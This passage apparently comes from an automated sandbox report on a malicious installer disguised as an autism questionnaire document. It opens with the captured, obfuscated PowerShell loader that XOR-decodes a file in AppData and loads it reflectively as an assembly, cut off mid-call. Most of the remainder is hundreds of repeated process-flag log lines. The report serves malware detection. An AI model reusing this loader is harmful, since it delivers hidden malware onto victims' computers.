$_.Length$ac4e9891fa848c834b332582d5737='PEdaTnlwcVotaXFyUV55cWxTVTxzK3FqO299cyR4cFFyTVdvMGptWmtGKWN6diNheTd2JW0xYXg0UUFQdCl9eVp4U1I4Pm94U3NwcjtQRUN5b205I3lTTVBJeHxRO1Zza3JqMGZ9UWZRc2V0Z0l1IUd7OHp4MFd6cXd8ZnJrcEB8flpJQFNlNChAcmpefkByYXFCQHU8MHZAYGthNkBUN15vQHZWKWleMWgjJkBUIXhyQFVEVEdAYGF3Z0BSb358QGBKZ09Ae0VDfl4xaXV8QF8/cF9eT0NIeEB1PDY/';$aa72f1a1fc04ca9b1e4f38c4d6a44=[sYsteM.io.FiLE]::ReAdaLlBYTes('C:\Users\user\AppData\Roaming\MicRoSoFt\hVCImqdacF\asiJIvOLrmcHx.OpSwIGAQKkYgZLV');fOR($a6eb59278704fda8e348cbb9154ed=0;$a6eb59278704fda8e348cbb9154ed -Lt $aa72f1a1fc04ca9b1e4f38c4d6a44.CoUnt;){FOr($afdf6f52050420a0ab96054f3fd1c=0;$afdf6f52050420a0ab96054f3fd1c -lT $ac4e9891fa848c834b332582d5737.LengtH;$afdf6f52050420a0ab96054f3fd1c++){$aa72f1a1fc04ca9b1e4f38c4d6a44[$a6eb59278704fda8e348cbb9154ed]=$aa72f1a1fc04ca9b1e4f38c4d6a44[$a6eb59278704fda8e348cbb9154ed] -BxOR $ac4e9891fa848c834b332582d5737[$afdf6f52050420a0ab96054f3fd1c];$a6eb59278704fda8e348cbb9154ed++;if($a6eb59278704fda8e348cbb9154ed -GE $aa72f1a1fc04ca9b1e4f38c4d6a44.CoUnt){$afdf6f52050420a0ab96054f3fd1c=$ac4e9891fa848c834b332582d5737.LeNGTh}}};[SYstem.RefLECtIon.ASseMblY]::LOAD($aa72f1a1fc04ca9b1e4f38c4d6a44);[MArS.dEimOs]::inTErACT(

            Hooking and other Techniques for Hiding and Protection:

            Icon mismatch, binary includes an icon from a different legit application in order to fool users
            Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (98).png
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpCode function: 3_2_005C90B4 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,MessageBoxW,SetActiveWindow,3_2_005C90B4
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpCode function: 3_2_006A68B0 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,SetActiveWindow,3_2_006A68B0
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
